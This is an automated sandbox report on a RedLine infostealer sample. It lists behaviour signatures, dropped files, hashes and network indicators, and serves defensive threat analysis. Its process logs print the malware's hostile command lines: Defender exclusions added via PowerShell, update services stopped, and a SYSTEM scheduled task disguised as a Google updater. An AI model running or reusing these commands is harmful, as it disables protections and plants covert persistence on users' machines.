Malware Analysis Report

2025-01-18 08:58

Sample ID 230811-adrczahf95
Target 43866279c665ce788216110e56726c1b82817ab79bbc9.exe
SHA256 43866279c665ce788216110e56726c1b82817ab79bbc9c13be309043455a74a4
Tags redline logsdiller cloud (tg: @logsdillabot) infostealer spyware stealer evasion themida
Score 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score 10/10

SHA256 43866279c665ce788216110e56726c1b82817ab79bbc9c13be309043455a74a4

Threat Level: Known bad

The file 43866279c665ce788216110e56726c1b82817ab79bbc9.exe was found to be: Known bad.

Malicious Activity Summary

redline logsdiller cloud (tg: @logsdillabot) infostealer spyware stealer evasion themida

RedLine

Suspicious use of NtCreateUserProcessOtherParentProcess

Drops file in Drivers directory

Downloads MZ/PE file

Stops running service(s)

Reads user/profile data of web browsers

Themida packer

Executes dropped EXE

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Launches sc.exe

Program crash

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2023-08-11 00:06

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2023-08-11 00:06
Reported: 2023-08-11 00:08
Platform: win7-20230712-en
Max time kernel: 118s
Max time network: 120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\43866279c665ce788216110e56726c1b82817ab79bbc9.exe"

Signatures

RedLine

infostealer redline

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\43866279c665ce788216110e56726c1b82817ab79bbc9.exe | N/A

Processes

C:\Users\Admin\AppData\Local\Temp\43866279c665ce788216110e56726c1b82817ab79bbc9.exe

"C:\Users\Admin\AppData\Local\Temp\43866279c665ce788216110e56726c1b82817ab79bbc9.exe"

Network

Country | Destination | Domain | Proto
NL | 136.244.98.226:33587 | | tcp

Files


Analysis: behavioral2

Detonation Overview

Submitted: 2023-08-11 00:06
Reported: 2023-08-11 00:08
Platform: win10v2004-20230703-en
Max time kernel: 68s
Max time network: 113s

Command Line

C:\Windows\Explorer.EXE

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess

Description | Indicator | Process | Target | Count
PID 4748 created 3160 | N/A | C:\Windows\Temp\setup.exe | C:\Windows\Explorer.EXE | 4

Downloads MZ/PE file

Drops file in Drivers directory

Description | Indicator | Process | Target
File created | C:\Windows\System32\drivers\etc\hosts | C:\Windows\Temp\setup.exe | N/A

Stops running service(s)

evasion

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\mi.exe | N/A
N/A | N/A | C:\Windows\Temp\setup.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cli.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cc.exe | N/A

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida

Description | Indicator | Process | Target | Count
N/A | N/A | N/A | N/A | 18

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | ip-api.com | N/A | N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\Temp\setup.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 3872 set thread context of 4952 | N/A | C:\Users\Admin\AppData\Local\Temp\cli.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Launches sc.exe

Description | Indicator | Process | Target | Count
N/A | N/A | C:\Windows\System32\sc.exe | N/A | 5

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target | Count
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\43866279c665ce788216110e56726c1b82817ab79bbc9.exe | N/A | 1
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A | 10
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A | 10
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A | 3
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A | 4
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A | 4
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A | 2
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A | 2
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A | 2
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A | 2
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A | 2
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A | 2
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A | 2
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A | 2
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A | 2
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A | 2
Token: SeRestorePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A | 2
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A | 2
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A | 1
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A | 1
Token: SeUndockPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A | 1
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A | 1
Token: 33 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A | 1
Token: 34 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A | 1
Token: 35 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A | 1
Token: 36 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A | 1

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target | Count
PID 4476 wrote to memory of 3512 | N/A | C:\Users\Admin\AppData\Local\Temp\43866279c665ce788216110e56726c1b82817ab79bbc9.exe | C:\Users\Admin\AppData\Local\Temp\mi.exe | 3
PID 3512 wrote to memory of 4748 | N/A | C:\Users\Admin\AppData\Local\Temp\mi.exe | C:\Windows\Temp\setup.exe | 2
PID 4476 wrote to memory of 3872 | N/A | C:\Users\Admin\AppData\Local\Temp\43866279c665ce788216110e56726c1b82817ab79bbc9.exe | C:\Users\Admin\AppData\Local\Temp\cli.exe | 3
PID 3872 wrote to memory of 4952 | N/A | C:\Users\Admin\AppData\Local\Temp\cli.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | 5
PID 4476 wrote to memory of 4528 | N/A | C:\Users\Admin\AppData\Local\Temp\43866279c665ce788216110e56726c1b82817ab79bbc9.exe | C:\Users\Admin\AppData\Local\Temp\cc.exe | 3
PID 4220 wrote to memory of 1684 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe | 2
PID 4220 wrote to memory of 488 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe | 40
PID 4220 wrote to memory of 2196 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe | 2
PID 4220 wrote to memory of 4296 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe | 4

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\43866279c665ce788216110e56726c1b82817ab79bbc9.exe

"C:\Users\Admin\AppData\Local\Temp\43866279c665ce788216110e56726c1b82817ab79bbc9.exe"

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Windows\Temp\setup.exe

"C:\Windows\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\cli.exe

"C:\Users\Admin\AppData\Local\Temp\cli.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3872 -ip 3872

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3872 -s 284

C:\Users\Admin\AppData\Local\Temp\cc.exe

"C:\Users\Admin\AppData\Local\Temp\cc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4476 -ip 4476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4476 -s 2632

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=44251 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User DataZGLV1" --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataZGLV1" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User DataZGLV1\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataZGLV1" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffec0fb9758,0x7ffec0fb9768,0x7ffec0fb9778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=1360 --field-trial-handle=1444,i,18067167158138806393,15748960425231055112,131072 --disable-features=PaintHolding /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1668 --field-trial-handle=1444,i,18067167158138806393,15748960425231055112,131072 --disable-features=PaintHolding /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=44251 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1976 --field-trial-handle=1444,i,18067167158138806393,15748960425231055112,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=44251 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2364 --field-trial-handle=1444,i,18067167158138806393,15748960425231055112,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=44251 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2512 --field-trial-handle=1444,i,18067167158138806393,15748960425231055112,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=44251 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3148 --field-trial-handle=1444,i,18067167158138806393,15748960425231055112,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=44251 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3304 --field-trial-handle=1444,i,18067167158138806393,15748960425231055112,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=44251 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3432 --field-trial-handle=1444,i,18067167158138806393,15748960425231055112,131072 --disable-features=PaintHolding /prefetch:1

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp
US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp
US | 8.8.8.8:53 | 1.202.248.87.in-addr.arpa | udp
US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 108.211.229.192.in-addr.arpa | udp
NL | 136.244.98.226:33587 | | tcp
US | 8.8.8.8:53 | 226.98.244.136.in-addr.arpa | udp
US | 8.8.8.8:53 | transfer.sh | udp
DE | 144.76.136.153:443 | transfer.sh | tcp
US | 8.8.8.8:53 | 153.136.76.144.in-addr.arpa | udp
US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 8.3.197.209.in-addr.arpa | udp
US | 8.8.8.8:53 | www.microsoft.com | udp
NL | 104.85.1.163:80 | www.microsoft.com | tcp
NL | 104.85.1.163:443 | www.microsoft.com | tcp
US | 8.8.8.8:53 | ip-api.com | udp
US | 208.95.112.1:80 | ip-api.com | tcp
US | 8.8.8.8:53 | 163.1.85.104.in-addr.arpa | udp
RU | 185.159.129.168:80 | | tcp
US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp
RU | 185.149.146.118:80 | | tcp
US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp
RU | 77.91.77.144:80 | | tcp
US | 8.8.8.8:53 | 254.128.241.8.in-addr.arpa | udp
N/A | 224.0.0.251:5353 | | udp
N/A | 127.0.0.1:44251 | | tcp
N/A | 127.0.0.1:44251 | | tcp
N/A | 127.0.0.1:44251 | | tcp
N/A | 127.0.0.1:44251 | | tcp
US | 8.8.8.8:53 | youtube.com | udp
NL | 216.58.214.14:443 | youtube.com | tcp
US | 8.8.8.8:53 | 100.39.251.142.in-addr.arpa | udp
US | 8.8.8.8:53 | 195.179.250.142.in-addr.arpa | udp
US | 8.8.8.8:53 | 14.214.58.216.in-addr.arpa | udp

Files


C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

C:\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

\??\pipe\crashpad_4220_YPBHZRUYMZTJQNKC

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZGLV1\Default\DawnCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZGLV1\Default\DawnCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZGLV1\Default\DawnCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZGLV1\Default\DawnCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_teqgw5y4.45b.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Windows\system32\drivers\etc\hosts

MD5 2d29fd3ae57f422e2b2121141dc82253
SHA1 c2464c857779c0ab4f5e766f5028fcc651a6c6b7
SHA256 80a60d7ec533d820de20bcedeb41319e7b1def548b6ea73ddbd69455bac4e7a4
SHA512 077a5c554663be7b71f181d961f5c98c732bc296dc015ffee30768a648bee3aad62c39c352cf2947432be19519906aeac7dfaf2557d309bb460732abb7fdbc68

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

C:\Program Files\Google\Chrome\updater.exe

MD5 d48d4789fb8347baf4137dcf63bc3c82
SHA1 8759e0fc9ee63b867f85cdaf4171ff0007d592c3
SHA256 0f4e0149ecb81286201691492477a10e9291481d76790cd1c354b72aa02bca7a
SHA512 cc7d05d36f655e0e981cffe9a9976042f50ef261c955729ed472c393c1c9bad6a5546cfa920219279257f29e5635a113ed27f9ffffad9e5c5205d94c797c4058